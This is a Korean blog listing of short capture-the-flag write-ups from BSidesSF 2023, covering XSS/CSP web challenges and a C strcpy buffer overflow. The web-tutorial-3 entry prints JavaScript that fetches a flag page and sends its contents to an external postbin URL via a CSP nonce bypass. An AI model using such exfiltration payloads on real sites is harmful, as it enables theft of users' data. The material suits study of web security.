본문 바로가기

전체 글237

[BSidesSF 2023 CTF] web-tutorial-3 1. 개요 XSS, CSP 문제 2. 분석 CSP를 보면, script는 nonce가 일치할때 실행가능하고, https로 제공되어야한다고합니다. 코드를 살펴보면, nonce="corgi" 입니다. 시나리오는 - 다음 JS 코드를 AWS S3 버킷에 올립니다. fetch("/xss-three-flag") .then(r => r.text()) .then(t => fetch("https://www.toptal.com/developers/postbin/1682170081878-4064430973958?flag=" + t)) - payload로 버킷 url을 제공합니다. (none="corgi") 입력 flag를 얻었습니다. 2023. 4. 22.
[BSidesSF 2023 CTF] web-tutorial-2 1. 개요 XSS, CSP 문제 2. 분석 첫번째 문제와 다르게 script 태그는 사용하지 못하지만, 자바스크립트 이벤트 핸들러는 가능하다고 합니다. 스크립트 태그 없이 XSS를 실행시킵니다. 2023. 4. 22.
[BSidesSF 2023 CTF] web-tutorial-1 1. 개요 XSS, CSP 문제 2. 분석 admin의 권한으로 /xss-one-flag를 읽고, 그 결과를 제가 만든 서버에 전송하도록 만듭니다. 2023. 4. 22.
[BSidesSF 2023 CTF] overflow 1. 개요 overflow 문제 2. 분석 코드를 보면 c로 작성된 프로그램을 실행시킬때 argument를 받고 buffer_two 변수에 stcpy로 넣습니다. buffer_one 변수에 저장된 값이 "hacked"일때 flag를 얻습니다. 따라서, stcpy함수는 문자열을 복사할때 메모리 제한이 없기 때문에 argument로 buffer_two의 메모리 8 바이트를 초과하는 문자열을 넣어 buffer_one을 hacked로 만듭니다. #include #include #include #include int main(int argc, char *argv[]) { int value = 5; char buffer_one[8], buffer_two[8]; strcpy(buffer_one, "one"); /* .. 2023. 4. 22.